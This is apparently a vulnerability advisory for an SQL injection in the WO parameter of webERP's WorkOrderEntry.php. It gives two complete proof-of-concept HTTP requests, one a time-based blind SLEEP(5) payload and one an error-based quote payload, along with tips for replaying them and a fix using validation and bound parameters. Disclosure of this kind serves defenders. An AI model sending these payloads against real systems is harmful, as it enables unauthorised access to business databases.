Overview
webERP is a mature open-source ERP system providing best-practice, multi-user business administration and accounting tools over the web. The vulnerability lies in the WO (work order) parameter handled by WorkOrderEntry.php under the Manufacturing menu. The value of WO is used in a database query without input validation, so a logged-in user can inject arbitrary SQL; the time-based blind and error-based requests below demonstrate this.
Proof of Concept
Both requests are sent with the PHPSESSID cookie of a logged-in user and the FormID hidden-field value taken from the form webERP served to that user. When replaying them, URL-encode the WO payload and recompute Content-Length to match the encoded body.
Time-based Blind SQL Injection
POST /weberp/WorkOrderEntry.php HTTP/1.1
Host: 1.1.1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: PHPSESSID=n9g1ts0s7oigk88eto8f8nm111
Content-Type: application/x-www-form-urlencoded
Content-Length: 207

FormID=ff60696dab6b35c56558628b7237a624be19ad11&WO=33' AND SLEEP(5) AND '1'='1&StockLocation=MEL&StartDate=14/09/2012&RequiredBy=14/09/2012&NumberOfOutputs=0&submit=&StockCat=All&Keywords=&StockCode=

The response is delayed by roughly five seconds when the injected SLEEP(5) executes, which confirms the injection even though the page itself shows no error.
Error-based SQL Injection
POST /weberp/WorkOrderEntry.php HTTP/1.1
Host: 1.1.1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: PHPSESSID=n9g1ts0s7oigk88eto8f8nm111
Content-Type: application/x-www-form-urlencoded
Content-Length: 207

FormID=ff60696dab6b35c56558628b7237a624be19ad11&WO=33'&StockLocation=MEL&StartDate=14/09/2012&RequiredBy=14/09/2012&NumberOfOutputs=0&submit=&StockCat=All&Keywords=&StockCode=

The single quote appended to the work-order number terminates the string literal in the query, and the resulting database error is reflected in the response.
Solution
Upgrade to the latest version, available at http://sourceforge.net/projects/web-erp/ . At the code level the fix is to validate that WO is an integer before it is used and to pass it to the database as a bound parameter (or, failing that, through the database driver's escaping function) rather than splicing it into the query text.